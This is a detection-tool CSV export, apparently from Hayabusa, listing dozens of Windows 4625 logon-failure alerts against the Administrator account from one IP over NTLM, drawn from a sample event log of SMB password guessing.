+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.884 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.361 
